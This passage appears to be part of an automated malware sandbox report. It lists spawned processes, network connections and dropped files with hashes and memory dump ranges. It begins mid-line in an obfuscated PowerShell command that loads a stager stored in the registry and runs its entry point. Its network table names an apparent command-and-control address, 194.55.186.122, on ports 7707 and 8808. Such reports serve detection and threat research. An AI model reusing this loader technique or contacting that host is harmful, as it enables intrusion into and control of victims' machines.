try]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+'7'+''+'s'+'t'+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{6005f29e-e544-43b0-8cc1-ce61f6fe6629}

C:\Users\Admin\AppData\Roaming\server.exe

"C:\Users\Admin\AppData\Roaming\server.exe"

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe b79514e16fe3047c57398db5e378dfa7 rdTHSDBjr0qVj/XVtoWHUg.0.1.0.0.0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

Network

Country  Destination           Domain                     Proto
US       8.8.8.8:53            raw.githubusercontent.com  udp
US       8.8.8.8:53            raw.githubusercontent.com  udp
N/A      127.0.0.1:6606        -                          tcp
US       8.8.8.8:53            raw.githubusercontent.com  udp
N/A      127.0.0.1:7707        -                          tcp
NL       194.55.186.122:7707   -                          tcp
US       8.8.8.8:53            raw.githubusercontent.com  udp
N/A      127.0.0.1:6606        -                          tcp
NL       194.55.186.122:8808   -                          tcp
N/A      127.0.0.1:6606        -                          tcp
N/A      127.0.0.1:7707        -                          tcp
NL       194.55.186.122:8808   -                          tcp
N/A      127.0.0.1:7707        -                          tcp
NL       194.55.186.122:8808   -                          tcp
NL       194.55.186.122:8808   -                          tcp
N/A      127.0.0.1:6606        -                          tcp
N/A      127.0.0.1:7707        -                          tcp
N/A      127.0.0.1:7707        -                          tcp
NL       194.55.186.122:7707   -                          tcp
NL       194.55.186.122:7707   -                          tcp

Files

memory/764-0-0x00007FF96DF73000-0x00007FF96DF75000-memory.dmp

memory/764-1-0x00000000007E0000-0x0000000000854000-memory.dmp

memory/764-2-0x0000000001130000-0x000000000117E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\server.exe

MD5 888ff5f8b060ce5be6249e2529a6a9ec
SHA1 f2a2facd8e9f5d000102a90cd487a99c3acf5c42
SHA256 5fc41380ed9f0400d4ffd34d0ef12099d88210904fe2f539acc7c16391da8f66
SHA512 8590feb0ecbae8d408addc37a177eabcfb338e193cf34b81310a1b67f56be0de4850c5269e26bdc8670a109aa21c3560cad0571c9a4867871a88f53978e5b598

memory/2472-64-0x0000000074B8E000-0x0000000074B8F000-memory.dmp

memory/2472-65-0x0000000000FC0000-0x000000000100C000-memory.dmp

memory/2472-66-0x0000000005940000-0x00000000059A6000-memory.dmp

memory/2472-67-0x0000000005E10000-0x0000000005EAC000-memory.dmp

memory/2472-68-0x0000000074B80000-0x0000000075330000-memory.dmp

memory/2472-73-0x0000000005DE0000-0x0000000005DF2000-memory.dmp

memory/2472-74-0x0000000006E30000-0x00000000073D4000-memory.dmp

memory/2472-79-0x0000000074B80000-0x0000000075330000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp9819.tmp.bat

MD5 f6726e87c8c22df2839770999a832d7e
SHA1 5943005dfc609b2651bf81bf0f7f31a110f64e74
SHA256 246614c2528aeaa22120bd15939d660da0ca6539fe7d3771132985e21c893cf8
SHA512 7bcf1a46e3c9294fe53c5277ef6600bed787b6914db45b6375dbd98f2d055caf65186f4237d1dd01c38fa79214ee8e8fafccfd653e3b15654334bcbf895eb505

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\server.exe.log

MD5 294367dd291cf52c49e0aea7db745ab7
SHA1 77f54d0d35dad4fde4a37791f0ad4b087ee453ef
SHA256 245d0397c53126c9af23db4a3cf4e08ecbee60ecc2fdbba69b12cc7d606b7b8e
SHA512 c685bc0efe880d221cd91fce12cc51aefba31c174786ab3caf6c00d4e763ba1dc45fd4f757793e367edf44cf5d64477ce88beec74ba48c48a3e408ad7376cf3b

C:\Windows\Logs\ReAgent\ReAgent.log

MD5 266ea1ffc8670bc3e9c92ccefa373ad6
SHA1 623d5dc356ff804915881a8d42eff55dc1eff3a4
SHA256 351766394c116eca9b8884947c1676b5918198acb2274d9a37f3c77719bd9011
SHA512 f105baf9e89826b4d05aa8df6983818ff59bbb18466a77472b47603f0dcb9251216b45636a82a55634262d50fc5de1953b41c28d84662ff3dabe02e68c42c92b

C:\Windows\SysWOW64\Recovery\ReAgent.xml

MD5 7ba1a1ae453e18669377cbd6eb101109
SHA1 e57bd758fffefce630ab1399876f5c50e67c7804
SHA256 0f7d35d68a237b9c7d6d24c736e9a758761bb0840c113686b81e2ce33928ef65
SHA512 7060bf7aeeaeaf1fb85f427307463ca00f3050318f8630e08a92d7be9f0a4870d8c44c3323c9b81df6f1651ad8171009c0abde3b11f766da238c785f72ba05ff

C:\Windows\Panther\UnattendGC\diagwrn.xml

MD5 25f5c74b9830bb0ea88b6ab50a4405aa
SHA1 746653818c6f3a0e639bb48a5aa3354ea36b1da8
SHA256 40dd1b8f476482250183cebb743267291d451b382c14399982db893cabb61902
SHA512 8fe9f2767cdc886e3bb40d07cef8eb4ebd661cda454640878f7885990fa0d71de3ca242aa84a9e2e50ea386dc86dfdbced8764f66f775151d0501a60f8848c26

C:\Windows\Panther\UnattendGC\diagerr.xml

MD5 8344f40836cda9a798f11905f5e6c4ff
SHA1 fdc4d205d8cbe99a59b47a7d14cf28eddcd393b7
SHA256 d5a66c8848bfeecf05fb4ed643ea0888225190b87b79266fbd3a4a3dafb19cea
SHA512 1ff61300a2dd8208f78720ab35f9f2934cc40c3b2c3f0024debe53e7e956a73c62946601f66093f7af91be63d9581b77d52d496b88a07cac4ebbb98f6f43a32d

memory/868-93-0x0000000005E20000-0x0000000005E49000-memory.dmp

memory/2220-94-0x0000000000400000-0x000000000042B000-memory.dmp

memory/2220-97-0x0000000000400000-0x000000000042B000-memory.dmp

memory/3992-99-0x000002366D650000-0x000002366D672000-memory.dmp

C:\Windows\Temp\__PSScriptPolicyTest_ojryzihi.dz3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3992-108-0x0000023670040000-0x000002367006A000-memory.dmp

memory/3992-110-0x00007FF98B450000-0x00007FF98B50E000-memory.dmp

memory/3992-109-0x00007FF98C270000-0x00007FF98C465000-memory.dmp

memory/1924-114-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1924-118-0x00007FF98B450000-0x00007FF98B50E000-memory.dmp

memory/1924-116-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1924-113-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1924-112-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1924-111-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1924-119-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1924-117-0x00007FF98C270000-0x00007FF98C465000-memory.dmp

memory/672-143-0x00007FF94C2F0000-0x00007FF94C300000-memory.dmp

memory/952-155-0x00007FF94C2F0000-0x00007FF94C300000-memory.dmp

memory/64-166-0x00007FF94C2F0000-0x00007FF94C300000-memory.dmp

memory/64-165-0x000001A5719A0000-0x000001A5719CB000-memory.dmp

memory/64-159-0x000001A5719A0000-0x000001A5719CB000-memory.dmp

memory/512-173-0x000002837CAF0000-0x000002837CB1B000-memory.dmp

memory/868-171-0x0000000005EF0000-0x0000000005F82000-memory.dmp

memory/952-154-0x000002CA3CB00000-0x000002CA3CB2B000-memory.dmp

memory/952-148-0x000002CA3CB00000-0x000002CA3CB2B000-memory.dmp

memory/672-142-0x000001A852000000-0x000001A85202B000-memory.dmp

memory/672-136-0x000001A852000000-0x000001A85202B000-memory.dmp

memory/616-132-0x00007FF94C2F0000-0x00007FF94C300000-memory.dmp

memory/616-131-0x000001C6701F0000-0x000001C67021B000-memory.dmp

memory/616-125-0x000001C6701F0000-0x000001C67021B000-memory.dmp

memory/616-124-0x000001C6701F0000-0x000001C67021B000-memory.dmp

memory/616-123-0x000001C6701C0000-0x000001C6701E5000-memory.dmp

memory/868-493-0x00000000061E0000-0x0000000006202000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 4c3d2f52ebbc385b6a59fda070b8e90c
SHA1 ab073fcd4b3669b751b2d3bcdc780b0d23afc530
SHA256 31eed57f34247ba01371716d80544208b1c32194bd0cd807482d615bcb0efacd
SHA512 18bdbe36b1f82daaf8ea830964d99f7fa06f76d4e7ba58c8c4f289c98e395db3cfdf3a41d5086276e2263da98d64cbc8214fd07e957aaa06d8add884692349f8

C:\Windows\Logs\ReAgent\ReAgent.log

MD5 5ecbc850b5fa6473ff523a13973d358a
SHA1 5b0b85fb1ed11a3305c14d7d92eef650e8f22ca8
SHA256 b69048b84eaf46d31f9f255b61025031c0365d479c0b171fa3b43e149d065ce9
SHA512 56703d5aaf8924711f02b51944448e088849a59f98bc3861e0b54419fdbb61e21b633d522a5d1f6a422c632f58f8e6411433bc50850fa8be69d65a0e8e0366ee

C:\Windows\Panther\UnattendGC\diagerr.xml

MD5 b51715c98c2681b1db8672fdec572f8a
SHA1 f59faed191b4753a5cfc75a389db0421131dc6db
SHA256 0f9dbe75d90fb68cb5a79c7d7b8ddcf96dde63f87351160f3491627b28b54347
SHA512 80d8ee2ec011a5d4e18a5f866926147b40f6cf529ad2b99491f35697dd416aef05577c52630271b5745a352733c9b01ddc6dfb4424b0c0b4f523c7d1d0dd9a8c

C:\Windows\Panther\UnattendGC\setuperr.log

MD5 ced1ca365726eae2eb5ac2b0e64673f2
SHA1 ee405c8372585fa61e29287824c455b613ac4ccd
SHA256 972782c06405959ac6c88ccfb5fedd47344f29771f8cabb868549d3307e5c9fa
SHA512 b12fa66715181031db278e44726278e05fd4c56b5eb8d21295f8a1e4b3da6e3fbf1d5006be3967f195118e43c6f691dbf8eb551354b5b9acd5606b2439178e5f

C:\Windows\Panther\UnattendGC\diagwrn.xml

MD5 3306412a599a75950385f5c9d0a31073
SHA1 32d6ee13c5cddec57f5cad2df077d836fec2051d
SHA256 74807a52dcf3f68efebcd0d5c7b56bbd8a756af693bbf3fba146d10b0c7901d9
SHA512 1709d9d287303c816d515720b579d12419341c20098f49bb1788acd54d1d9301b927487afe123209b47b1d5058ffaf0cad050ea689b15c86822fae43eda8238f

C:\Windows\TEMP\tmpFC61.tmp.bat

MD5 c9a05695479ccfbcd7a10d1048c046fa
SHA1 a5d42616f6834c37499e11a265693f05922ed5e4
SHA256 eb84a275f490cf0b921de3f0246bfe9dc815306f78cd5f9badccfb6211177eb9
SHA512 60e6625d63eb658767a923545decf7a2940163242fa73415c3aaf16bd7f6ab6492ec45957f18ee7026c60f1331cea67d4421055b769848474ab422fe3fca91dd

C:\Windows\Logs\ReAgent\ReAgent.log

MD5 43f9997115d7b372562c298182c8833b
SHA1 b20767a81183fc60e9d52d3cf35b0abac8ba273d
SHA256 9ce0e6cd1f842eb0ebd0b12c4e6a6e2d1a6d43cd5a99c59e2ecf11873d8568b0
SHA512 72dd52a48b96c2ff4e21466316146a5f5ef3b73c1711e9f0a30abbeaae976a4b9ecc01a703eee0dd030a039438f07bb1218e04d06ac3634822502de47102c472

C:\Windows\Panther\UnattendGC\diagwrn.xml

MD5 5f987e19ed33f457d5ee0c0835d9061f
SHA1 72b59285725842b5c9ac10a00d9d704c523704c9
SHA256 f59832cc4e69f6a68f7f1c954efb8ccd27d925d87c505c3f0cfb125e1b68054c
SHA512 f27184ab689fd7e1fa03929ad3a3dadf42fab0940ff100ea979244ba970a5a5efb0614e855c22ed6cbec8c5669514816558a85d1c1eb9d771a4f266f7ea21e67

C:\Windows\Panther\UnattendGC\diagerr.xml

MD5 dfddf05354ab8c10c2e886ae2ada45d4
SHA1 af0834010af7a4bcb971c095d932c7a91eb832a7
SHA256 df5970399b7180ee2fd6b3a5d66a88769d9f406296cee757dd298cb9efdfca5d
SHA512 f980232b84b307fa8a35d43b8a3212cacbbe94545d9cdf45567d28205578fd387e08c3231faaecb62170879b05049559e35cd8d0e037ee133d07a85df7fc1b80

C:\Windows\Panther\UnattendGC\setuperr.log

MD5 fa3090ad564214fafcade78a25cc74be
SHA1 32992fbeaf109d47635587c421a8886b25d56619
SHA256 07030a6323223b7a89157b3958dae612ffe80c0859a1a7c33a2815f93dc8d326
SHA512 504e7c9f9dd1581b86a5167edf9ed7e9a3e943399bfcfab7f3b4d9e6447902fc099719a63720aec7276fc587da22cf330eea5943772bb1cf2946d27da78e20c5

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa187cac09f051e24146ad549a0f08a6
SHA1 2ef7fae3652bb838766627fa6584a6e3b5e74ff3
SHA256 7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
SHA512 960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2